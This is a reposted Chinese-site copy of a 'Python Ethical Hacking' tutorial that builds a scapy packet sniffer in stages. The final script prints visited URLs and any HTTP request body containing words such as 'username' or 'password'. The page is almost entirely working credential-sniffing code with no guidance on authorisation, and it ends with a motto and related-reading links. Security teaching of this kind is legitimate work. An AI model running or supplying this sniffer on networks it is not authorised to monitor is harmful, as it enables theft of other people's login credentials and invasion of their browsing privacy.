zoukankan html css js c++ java

Python Ethical Hacking

PACKET_SNIFFER

Capture data flowing through an interface.
Filter this data.
Display Interesting information such as:
- Login info(username&password).
- Visited websites.
- Images.
- ...etc

PACKET_SNIFFER

CAPTURE & FILTER DATA

scapy has a sniffer function.
Can capture data sent to/from iface.
Can call a function specified in prn on each packet.

Install the third party package.

pip install scapy_http

1. Write the Python to sniff all the Raw packets.

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *

def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        if packet.haslayer(scapy.all.Raw):
            print(packet.show())

sniff("eth0")

Execute the script and sniff the packets on eth0.

2. Filter the useful packets

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *

def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        if packet.haslayer(scapy.all.Raw):
            print(packet[scapy.all.Raw].load)

sniff("eth0")

Execute the script and sniff the packets on eth0.

Rewrite the Python Script to filter the keywords.

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *


def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        if packet.haslayer(scapy.all.Raw):
            load = packet[scapy.all.Raw].load.decode(errors='ignore')
            keywords = ["username", "user", "login", "password", "pass"]
            for keyword in keywords:
                if keyword in load:
                    print(load)
                    break


sniff("eth0")

Add the feature - Extracting URL

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *


def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        url = packet[HTTPRequest].Host + packet[HTTPRequest].Path
        print(url)

        if packet.haslayer(scapy.all.Raw):
            load = packet[scapy.all.Raw].load.decode(errors='ignore')
            keywords = ["username", "user", "login", "password", "pass"]
            for keyword in keywords:
                if keyword in load:
                    print(load)
                    break


sniff("eth0")

相信未来 - 该面对的绝不逃避，该执著的永不怨悔，该舍弃的不再留念，该珍惜的好好把握。

查看全文

相关阅读:
网络虚拟化技术（二）: TUN/TAP MACVLAN MACVTAP （转）
利用Linux信号SIGUSR1调试程序
 hugepage优势
 Linux top命令中CPU信息的详解（转）
如何快速学好Shell脚本？转
 转：基于TLS1.3的微信安全通信协议mmtls介绍
 docker 支持ipv6 (核心要点是ndp需要把docker内的ip全部加入到ndplist中来)
老毛子 Padavan 路由器固件开启教育网 IPv6 并实现IPv6转发
 Centos Firefox中文乱码
 浅析AnyCast网络技术

原文地址：https://www.cnblogs.com/keepmoving1113/p/11386213.html